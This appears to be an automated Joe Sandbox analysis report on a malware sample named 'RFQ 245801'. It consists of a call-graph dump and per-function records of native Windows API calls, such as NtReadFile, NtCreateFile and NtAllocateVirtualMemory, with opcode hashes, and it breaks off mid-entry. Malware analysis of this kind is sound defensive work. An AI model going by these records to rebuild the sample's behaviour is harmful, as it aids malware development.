97534->97506 97535->97534 97537 41bb84 97536->97537 97538 41bb6d 97536->97538 97537->97516 97538->97537 97539 41bf60 2 API calls 97538->97539 97540 41bb9b 97539->97540 97540->97516 97541->97507 97542->97493 97544 41af30 LdrLoadDll 97543->97544 97545 41a61c RtlAllocateHeap 97544->97545 97545->97532 97547 41bd3d 97546->97547 97669 41a510 97546->97669 97547->97437 97550 414081 97549->97550 97551 414089 97549->97551 97550->97440 97573 41435c 97551->97573 97672 41cf00 97551->97672 97553 4140dd 97554 41cf00 2 API calls 97553->97554 97557 4140e8 97554->97557 97555 414136 97558 41cf00 2 API calls 97555->97558 97557->97555 97677 41cfa0 97557->97677 97559 41414a 97558->97559 97560 41cf00 2 API calls 97559->97560 97562 4141bd 97560->97562 97561 41cf00 2 API calls 97570 414205 97561->97570 97562->97561 97564 414334 97684 41cf60 LdrLoadDll RtlFreeHeap 97564->97684 97566 41433e 97685 41cf60 LdrLoadDll RtlFreeHeap 97566->97685 97568 414348 97686 41cf60 LdrLoadDll RtlFreeHeap 97568->97686 97683 41cf60 LdrLoadDll RtlFreeHeap 97570->97683 97571 414352 97687 41cf60 LdrLoadDll RtlFreeHeap 97571->97687 97573->97440 97575 4153a1 97574->97575 97576 414a50 8 API calls 97575->97576 97577 4153b7 97576->97577 97578 4153f2 97577->97578 97579 415405 97577->97579 97583 41540a 97577->97583 97580 41bd90 2 API calls 97578->97580 97581 41bd90 2 API calls 97579->97581 97582 4153f7 97580->97582 97581->97583 97582->97445 97583->97445 97688 41ac00 97584->97688 97587 41ac00 LdrLoadDll 97588 41ad5d 97587->97588 97589 41ac00 LdrLoadDll 97588->97589 97590 41ad66 97589->97590 97591 41ac00 LdrLoadDll 97590->97591 97592 41ad6f 97591->97592 97593 41ac00 LdrLoadDll 97592->97593 97594 41ad78 97593->97594 97595 41ac00 LdrLoadDll 97594->97595 97596 41ad81 97595->97596 97597 41ac00 LdrLoadDll 97596->97597 97598 41ad8d 97597->97598 97599 41ac00 LdrLoadDll 97598->97599 97600 41ad96 97599->97600 97601 41ac00 LdrLoadDll 97600->97601 97602 41ad9f 97601->97602 97603 41ac00 LdrLoadDll 97602->97603 97604 41ada8 97603->97604 97605 41ac00 LdrLoadDll 97604->97605 97606 41adb1 97605->97606 97607 41ac00 LdrLoadDll 97606->97607 97608 41adba 97607->97608 97609 41ac00 LdrLoadDll 97608->97609 97610 41adc6 97609->97610 97611 41ac00 LdrLoadDll 97610->97611 97612 41adcf 97611->97612 97613 41ac00 LdrLoadDll 97612->97613 97614 41add8 97613->97614 97615 41ac00 LdrLoadDll 97614->97615 97616 41ade1 97615->97616 97617 41ac00 LdrLoadDll 97616->97617 97618 41adea 97617->97618 97619 41ac00 LdrLoadDll 97618->97619 97620 41adf3 97619->97620 97621 41ac00 LdrLoadDll 97620->97621 97622 41adff 97621->97622 97623 41ac00 LdrLoadDll 97622->97623 97624 41ae08 97623->97624 97625 41ac00 LdrLoadDll 97624->97625 97626 41ae11 97625->97626 97627 41ac00 LdrLoadDll 97626->97627 97628 41ae1a 97627->97628 97629 41ac00 LdrLoadDll 97628->97629 97630 41ae23 97629->97630 97631 41ac00 LdrLoadDll 97630->97631 97632 41ae2c 97631->97632 97633 41ac00 LdrLoadDll 97632->97633 97634 41ae38 97633->97634 97635 41ac00 LdrLoadDll 97634->97635 97636 41ae41 97635->97636 97637 41ac00 LdrLoadDll 97636->97637 97638 41ae4a 97637->97638 97639 41ac00 LdrLoadDll 97638->97639 97640 41ae53 97639->97640 97641 41ac00 LdrLoadDll 97640->97641 97642 41ae5c 97641->97642 97643 41ac00 LdrLoadDll 97642->97643 97644 41ae65 97643->97644 97645 41ac00 LdrLoadDll 97644->97645 97646 41ae71 97645->97646 97647 41ac00 LdrLoadDll 97646->97647 97648 41ae7a 97647->97648 97649 41ac00 LdrLoadDll 97648->97649 97650 41ae83 97649->97650 97651 41ac00 LdrLoadDll 97650->97651 97652 41ae8c 97651->97652 97653 41ac00 LdrLoadDll 97652->97653 97654 41ae95 97653->97654 97655 41ac00 LdrLoadDll 97654->97655 97656 41ae9e 97655->97656 97657 41ac00 LdrLoadDll 97656->97657 97658 41aeaa 97657->97658 97659 41ac00 LdrLoadDll 97658->97659 97660 41aeb3 97659->97660 97661 41ac00 LdrLoadDll 97660->97661 97662 41aebc 97661->97662 97662->97448 97664 41af30 LdrLoadDll 97663->97664 97665 419eac 97664->97665 97694 1762df0 LdrInitializeThunk 97665->97694 97666 419ec3 97666->97368 97668->97444 97670 41a52c NtAllocateVirtualMemory 97669->97670 97671 41af30 LdrLoadDll 97669->97671 97670->97547 97671->97670 97673 41cf10 97672->97673 97674 41cf16 97672->97674 97673->97553 97675 41bf60 2 API calls 97674->97675 97676 41cf3c 97675->97676 97676->97553 97678 41cfc5 97677->97678 97681 41cffd 97677->97681 97679 41bf60 2 API calls 97678->97679 97680 41cfda 97679->97680 97682 41bd90 2 API calls 97680->97682 97681->97557 97682->97681 97683->97564 97684->97566 97685->97568 97686->97571 97687->97573 97689 41ac1b 97688->97689 97690 414e50 LdrLoadDll 97689->97690 97691 41ac3b 97690->97691 97692 414e50 LdrLoadDll 97691->97692 97693 41ace7 97691->97693 97692->97693 97693->97587 97694->97666 97696 1762c11 97695->97696 97697 1762c1f LdrInitializeThunk 97695->97697 97696->97454 97697->97454 97699 41af30 LdrLoadDll 97698->97699 97700 41a65c RtlFreeHeap 97699->97700 97700->97458 97702 407eb0 97701->97702 97703 407eab 97701->97703 97704 41bd10 2 API calls 97702->97704 97703->97376 97707 407ed5 97704->97707 97705 407f38 97705->97376 97706 419e90 2 API calls 97706->97707 97707->97705 97707->97706 97708 407f3e 97707->97708 97712 41bd10 2 API calls 97707->97712 97717 41a590 97707->97717 97710 407f64 97708->97710 97711 41a590 2 API calls 97708->97711 97710->97376 97713 407f55 97711->97713 97712->97707 97713->97376 97715 40817e 97714->97715 97716 41a590 2 API calls 97714->97716 97715->97337 97716->97715 97718 41af30 LdrLoadDll 97717->97718 97719 41a5ac 97718->97719 97719->97707 97720 41a5cc 97719->97720 97722 1762c70 LdrInitializeThunk 97719->97722 97722->97719 97724 41b593 97723->97724 97727 40acf0 97724->97727 97728 40ad14 97727->97728 97729 409c5b 97728->97729 97730 40ad5d LdrLoadDll 97728->97730 97729->97345 97730->97729 97732 40b063 97731->97732 97732->97732 97734 40b0e0 97732->97734 97746 419c60 LdrLoadDll 97732->97746 97734->97350 97736 41af30 LdrLoadDll 97735->97736 97737 41a7bf LookupPrivilegeValueW 97736->97737 97737->97355 97739 41af30 LdrLoadDll 97738->97739 97740 41a24c 97739->97740 97747 1762ea0 LdrInitializeThunk 97740->97747 97741 41a26b 97741->97358 97744 41af30 LdrLoadDll 97743->97744 97745 41a1cc 97744->97745 97745->97351 97746->97734 97747->97741 97749 40b1f0 97748->97749 97750 40b040 LdrLoadDll 97749->97750 97751 40b204 97750->97751 97751->97292 97753 40ae51 97752->97753 97754 40ae4d 97752->97754 97755 40ae6a 97753->97755 97756 40ae9c 97753->97756 97754->97295 97798 419ca0 LdrLoadDll 97755->97798 97799 419ca0 LdrLoadDll 97756->97799 97758 40aead 97758->97295 97760 40ae8c 97760->97295 97762 40f4a0 3 API calls 97761->97762 97763 4143c6 97761->97763 97762->97763 97763->97297 97765 408a79 97764->97765 97800 4087a0 97764->97800 97767 4087a0 19 API calls 97765->97767 97770 408a9d 97765->97770 97768 408a8a 97767->97768 97768->97770 97818 40f710 10 API calls 97768->97818 97770->97299 97772 41af30 LdrLoadDll 97771->97772 97773 41a4ec 97772->97773 97937 1762e80 LdrInitializeThunk 97773->97937 97774 40c322 97776 40f4a0 97774->97776 97777 40f4bd 97776->97777 97938 419f90 97777->97938 97780 40f505 97780->97303 97781 419fe0 2 API calls 97782 40f52e 97781->97782 97782->97303 97784 419ffc 97783->97784 97785 41af30 LdrLoadDll 97783->97785 97945 1762d10 LdrInitializeThunk 97784->97945 97785->97784 97786 40c385 97786->97309 97786->97312 97789 41af30 LdrLoadDll 97788->97789 97790 41a04c 97789->97790 97946 1762d30 LdrInitializeThunk 97790->97946 97791 40c459 97791->97320 97794 41af30 LdrLoadDll 97793->97794 97795 419e0c 97794->97795 97947 1762fb0 LdrInitializeThunk 97795->97947 97796 40c4ac 97796->97324 97798->97760 97799->97758 97801 407ea0 4 API calls 97800->97801 97804 4087ba 97800->97804 97801->97804 97802 408a49 97802->97765 97803 408a3f 97805 408160 2 API calls 97803->97805 97804->97802 97804->97803 97808 419ed0 2 API calls 97804->97808 97812 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97804->97812 97815 419df0 2 API calls 97804->97815 97816 41a460 LdrLoadDll NtClose 97804->97816 97819 419ce0 97804->97819 97822 4085d0 97804->97822 97834 40f5f0 LdrLoadDll NtClose 97804->97834 97835 419d60 LdrLoadDll 97804->97835 97836 419d90 LdrLoadDll 97804->97836 97837 419e20 LdrLoadDll 97804->97837 97838 4083a0 97804->97838 97854 405f60 LdrLoadDll 97804->97854 97805->97802 97808->97804 97812->97804 97815->97804 97816->97804 97818->97770 97820 41af30 LdrLoadDll 97819->97820 97821 419cfc 97820->97821 97821->97804 97823 4085e6 97822->97823 97855 419850 97823->97855 97825 4085ff 97826 408771 97825->97826 97876 4081a0 97825->97876 97826->97804 97828 4086e5 97828->97826 97829 4083a0 11 API calls 97828->97829 97830 408713 97829->97830 97830->97826 97831 419ed0 2 API calls 97830->97831 97832 408748 97831->97832 97832->97826 97833 41a4d0 2 API calls 97832->97833 97833->97826 97834->97804 97835->97804 97836->97804 97837->97804 97839 4083c9 97838->97839 97916 408310 97839->97916 97842 41a4d0 2 API calls 97843 4083dc 97842->97843 97843->97842 97844 408467 97843->97844 97847 408462 97843->97847 97924 40f670 97843->97924 97844->97804 97845 41a460 2 API calls 97846 40849a 97845->97846 97846->97844 97848 419ce0 LdrLoadDll 97846->97848 97847->97845 97849 4084ff 97848->97849 97849->97844 97928 419d20 97849->97928 97851 408563 97851->97844 97852 414a50 8 API calls 97851->97852 97853 4085b8 97852->97853 97853->97804 97854->97804 97856 41bf60 2 API calls 97855->97856 97857 419867 97856->97857 97883 409310 97857->97883 97859 419882 97860 4198c0 97859->97860 97861 4198a9 97859->97861 97864 41bd10 2 API calls 97860->97864 97862 41bd90 2 API calls 97861->97862 97863 4198b6 97862->97863 97863->97825 97865 4198fa 97864->97865 97866 41bd10 2 API calls 97865->97866 97867 419913 97866->97867 97873 419bb4 97867->97873 97889 41bd50 97867->97889 97870 419ba0 97871 41bd90 2 API calls 97870->97871 97872 419baa 97871->97872 97872->97825 97874 41bd90 2 API calls 97873->97874 97875 419c09 97874->97875 97875->97825 97877 40829f 97876->97877 97878 4081b5 97876->97878 97877->97828 97878->97877 97879 414a50 8 API calls 97878->97879 97881 408222 97879->97881 97880 408249 97880->97828 97881->97880 97882 41bd90 2 API calls 97881->97882 97882->97880 97884 409335 97883->97884 97885 40acf0 LdrLoadDll 97884->97885 97886 409368 97885->97886 97887 40938d 97886->97887 97892 40cf20 97886->97892 97887->97859 97910 41a550 97889->97910 97893 40cf4c 97892->97893 97894 41a1b0 LdrLoadDll 97893->97894 97895 40cf65 97894->97895 97896 40cf6c 97895->97896 97903 41a1f0 97895->97903 97896->97887 97900 40cfa7 97901 41a460 2 API calls 97900->97901 97902 40cfca 97901->97902 97902->97887 97904 41a20c 97903->97904 97905 41af30 LdrLoadDll 97903->97905 97909 1762ca0 LdrInitializeThunk 97904->97909 97905->97904 97906 40cf8f 97906->97896 97908 41a7e0 LdrLoadDll 97906->97908 97908->97900 97909->97906 97911 41af30 LdrLoadDll 97910->97911 97912 41a56c 97911->97912 97915 1762f90 LdrInitializeThunk 97912->97915 97913 419b99 97913->97870 97913->97873 97915->97913 97917 408328 97916->97917 97918 40acf0 LdrLoadDll 97917->97918 97919 408343 97918->97919 97920 414e50 LdrLoadDll 97919->97920 97921 408353 97920->97921 97922 40835c PostThreadMessageW 97921->97922 97923 408370 97921->97923 97922->97923 97923->97843 97925 40f683 97924->97925 97931 419e60 97925->97931 97929 41af30 LdrLoadDll 97928->97929 97930 419d3c 97929->97930 97930->97851 97932 419e7c 97931->97932 97933 41af30 LdrLoadDll 97931->97933 97936 1762dd0 LdrInitializeThunk 97932->97936 97933->97932 97934 40f6ae 97934->97843 97936->97934 97937->97774 97939 419fa6 97938->97939 97940 41af30 LdrLoadDll 97939->97940 97941 419fac 97940->97941 97944 1762f30 LdrInitializeThunk 97941->97944 97942 40f4fe 97942->97780 97942->97781 97944->97942 97945->97786 97946->97791 97947->97796 97951 1762ad0 LdrInitializeThunk

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 0041A3DA Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 0 41a3da-41a429 call 41af30 NtReadFile
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID: 1JA$rMA$rMA
                                                                                                                                                                                  • API String ID: 2738559852-782607585
                                                                                                                                                                                  • Opcode ID: 757b6e1bc07b3bf09793faee9661551754b0ff6aec0333777d77dda8410c520e
                                                                                                                                                                                  • Instruction ID: d9496cab67eccaa2a300e7c2e8500b7217d72c9056333dd282b08d57620d7ac6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 757b6e1bc07b3bf09793faee9661551754b0ff6aec0333777d77dda8410c520e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 87F01DB2210148ABCB05DF98D890CEB7BADAF8C314B15869DFD0C97216C634E855CBA0
                                                                                                                                                                                  Function 0041A3E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 3 41a3e0-41a3f6 4 41a3fc-41a429 NtReadFile 3->4 5 41a3f7 call 41af30 3->5 5->4
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID: 1JA$rMA$rMA
                                                                                                                                                                                  • API String ID: 2738559852-782607585
                                                                                                                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                  • Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
                                                                                                                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                                                                                                                  Function 0041A2EA Relevance: 1.6, APIs: 1, Instructions: 66filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 204 41a2ea-41a2ee 205 41a2f0-41a329 call 41af30 204->205 206 41a338-41a381 call 41af30 NtCreateFile 204->206
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                  • Opcode ID: 94b546fadc3172d4cbd0974d002435d2c170b5460e604780f875a3b40548b332
                                                                                                                                                                                  • Instruction ID: 7d927b91c53d99ff772232a7bee72b09811667c0becba63b72a30f99829caa9b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 94b546fadc3172d4cbd0974d002435d2c170b5460e604780f875a3b40548b332
                                                                                                                                                                                  • Instruction Fuzzy Hash: DE1107B2215209ABCB08DF98DC85DEB77ADAF8C314F05824DFA4DA7241C630E851CBA4
                                                                                                                                                                                  Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 227 40acf0-40ad0c 228 40ad14-40ad19 227->228 229 40ad0f call 41cc20 227->229 230 40ad1b-40ad1e 228->230 231 40ad1f-40ad2d call 41d040 228->231 229->228 234 40ad3d-40ad4e call 41b470 231->234 235 40ad2f-40ad3a call 41d2c0 231->235 240 40ad50-40ad64 LdrLoadDll 234->240 241 40ad67-40ad6a 234->241 235->234 240->241
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                                  • Instruction ID: 667dcf47c4413345b20473d406be44d3d8b7ebea9a3b2269cd40777f9644ce6e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 79015EB5D0020DBBDB10EBA1DC42FDEB3799F54308F0045AAA908A7281F638EB54CB95
                                                                                                                                                                                  Function 0041A32A Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 251 41a32a-41a346 252 41a34c-41a381 NtCreateFile 251->252 253 41a347 call 41af30 251->253 253->252
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                  • Opcode ID: ee3695a4899577ce3d874c1ef7f2278fb65b84fc6352f54c306a385979961bef
                                                                                                                                                                                  • Instruction ID: 24e128ae343006bbbc751a00b5729f9aa9b5416c578219d56ac147f4e2306034
                                                                                                                                                                                  • Opcode Fuzzy Hash: ee3695a4899577ce3d874c1ef7f2278fb65b84fc6352f54c306a385979961bef
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4201B2B2251208AFCB08CF88DC95EEB77ADAF8C754F558248FA1D97245D630E851CBA4
                                                                                                                                                                                  Function 0041A330 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 254 41a330-41a346 255 41a34c-41a381 NtCreateFile 254->255 256 41a347 call 41af30 254->256 256->255
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                  • Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
                                                                                                                                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                  • Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4
                                                                                                                                                                                  Function 0041A50A Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 257 41a50a-41a54d call 41af30 NtAllocateVirtualMemory
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                  • Opcode ID: 78230f0ff9201d4745c2d2b452e3fe21bc602f113a9ce9da4f9caed57fd84e58
                                                                                                                                                                                  • Instruction ID: 3214efd615eb7748cce34c0857b00ece96d2b0a482458fe4319a666bc9c2efb0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 78230f0ff9201d4745c2d2b452e3fe21bc602f113a9ce9da4f9caed57fd84e58
                                                                                                                                                                                  • Instruction Fuzzy Hash: CBF05EB6210104AFDB14CF88CC80EE77B69AF8C314F158549FE489B241C230E811CFA0
                                                                                                                                                                                  Function 0041A510 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 260 41a510-41a526 261 41a52c-41a54d NtAllocateVirtualMemory 260->261 262 41a527 call 41af30 260->262 262->261
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                  • Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
                                                                                                                                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                                                                                  Function 0041A45E Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                  • Opcode ID: 25e6b8735553a4378f13bb0ccfcbc3dfc71a3b5083118c10cb058ef1580ccd1c
                                                                                                                                                                                  • Instruction ID: 5c9da78348f1c9ef571b357f18b9320631ab7668477cfade35412350ce0ea39f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 25e6b8735553a4378f13bb0ccfcbc3dfc71a3b5083118c10cb058ef1580ccd1c
                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E0C272200204BFD720EFA4CC45EDB7B68EF44364F104459F90EAB242C130E511CB90
                                                                                                                                                                                  Function 0041A460 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                  • Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
                                                                                                                                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
                                                                                                                                                                                  Function 01762B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
